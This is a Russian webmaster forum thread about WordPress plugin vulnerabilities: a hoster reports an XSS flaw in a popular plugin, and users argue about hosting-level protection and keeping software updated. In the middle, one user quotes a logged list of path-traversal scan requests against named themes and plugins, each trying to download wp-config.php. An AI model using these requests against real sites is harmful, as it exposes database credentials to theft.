- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Мы регулярно следим за появлением новых уязвимостей в плагинах WordPress, и в этой ветке я хочу сообщать о самых важных из них, тех, которые установлены на большом количестве сайтов. Думаю, эта информация может быть полезна для всего сообщества и в особенности для активных разработчиков на WordPress.
Первый плагин, который затронем: Nextend Facebook Connect - https://wordpress.org/plugins/nextend-facebook-connect/
Число установок: 137,759
Версии с найденной уязвимостью: до 1.5.1
Тип уязвимости: XSS (позволяет внедрять свой скрипт или html код на сайт)
Лечение: Обновить плагин до свежей версии, в данный момент уже доступна версия 1.5.3
Тема интересная, буду следить за ней. Спасибо ТС.
буду следить за ней.
Следить лучше за актуальными проблемами, а не пофиксенными полгода назад :)
А еще лучше на спец ресурсах. http://www.exploit-db.com/ например. И от доверенных лиц. Специалистов по безопасности, а не ммм.. хостеров "с проактивной защитой от вирусов".
А что бы резко сократить кол-во проблем есть золотое правило: брать всё только с оф ресурсов и вовремя обновляться. Это касается любого ПО, а не только ВП.
а не ммм.. хостеров "с проактивной защитой от вирусов".
Влад, у нас не только проактивная защита от вирусов, но и от XSS атак, SQL инъекций, спама в комментариях (не нужно устанавливать спец плагины wp), и ботов. То есть практически тот сервис, который предлагает CloudFlare (и кажется даже на бесплатном тарифе), но сразу на хостинге.
Касательно антивирусных баз, их несколько, актуальные уязвимости можно проверять например на http://www.cvedetails.com/ или упомянутом вами exploit-db.com, все верно, спору нет. Но мы постараемся выкладывать и рецепты лечения, на случай, если сайт уже заражен. Для продвинутых пользователей вылечить сайт не проблема, а для начинающих - морока. Постараемся ее облегчить :)
Влад,
Это кто?
у нас не только проактивная защита от вирусов, но и от XSS атак, SQL инъекций
Эти макаронные изделия на уши страшные слова втирай блондинкам. А что бы не позорится - хотя почитай что такое "проактивная защита" и какое она имеет отношение к вирусам и веб-серверам.
Про "защиту от XSS атак, SQL инъекций" - не менее шедеврально :)
но сразу на хостинге.
Фтопку такие хостинги!!!
Постараемся ее облегчить
Для этого нужно хотя бы понимать о чём речь.
Сканируют ...
/wp-content/themes/ypo-theme/download.php?download=../../../../wp-config.php
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
/wp-content/themes/Newspapertimes_1/download.php?filename=../../../../wp-config.php
/wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php
/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
/wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&filename=wp-config.php&action=download
/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php
/wp-content/themes/jarida/download.php?uri=../../../wp-config.php
/wp-content/themes/tess/download.php?file=../../../wp-config.php
/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/force-download.php?file=../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php
/wp-content/themes/corporate_works/downloader.php?file_download=../../../wp-config.php
/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php
/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php
SeVlad, С незнакомцами я предпочитаю общаться на Вы :)
Проактивная защита это та защита, которая не дает попасть вирусу, в нашем случае зачастую шелу, на сервер. А если попадает, то сразу удаляется, и не дает ему запуститься. Именно это мы и имеем ввиду, и именно такая защита у нас установлена.
XSS атаки, SQL инъекции зачастую можно отфильтровать, если сканировать трафик. Я думаю вам знаком модуль mod_security, который именно это и делает. Правда он справляется с задачей не так хорошо (из нашего опыта) и нам по тем или иным причинам не подходит, так что у нас немного другая защита, но это не столь принципиально.
Правильно фильтруя трафик можно отмести ботов и спам (намекну - через анализ POST запросов)
Удачи :)
А что бы резко сократить кол-во проблем есть золотое правило: брать всё только с оф ресурсов и вовремя обновляться. Это касается любого ПО, а не только ВП.
т.е. премиум шаблоны с набором плагинов и супортом
С незнакомцами я предпочитаю общаться на Вы
Общайся.
Проактивная защита это та защита, которая не дает попасть вирусу, в нашем случае зачастую шелу, на сервер.
Иди учи матчасть, просветитель.
XSS атаки, SQL инъекции зачастую можно отфильтровать, если сканировать трафик. Я думаю вам знаком модуль mod_security, который именно это и делает.
рукалицо
т.е. премиум шаблоны с набором плагинов и супортом
Касаемо ВП - лучше в офрепо. Там хоть перепроверено сотни раз десятками способов тысячами специалистов. И то, бывают накладки. Что уж говорить за другие ресурсы. Тем более коммерческие.
WP вообще одна из самых дырявых и не оптимизированных CMS.
Угу... особенно если установить тему и плагины с какого-нибудь левого сайта, да? :)
WP вообще одна из самых дырявых и не оптимизированных CMS.
Обоснуешь? Или и как все, кто это "предъявляет" сольёшься?
🍿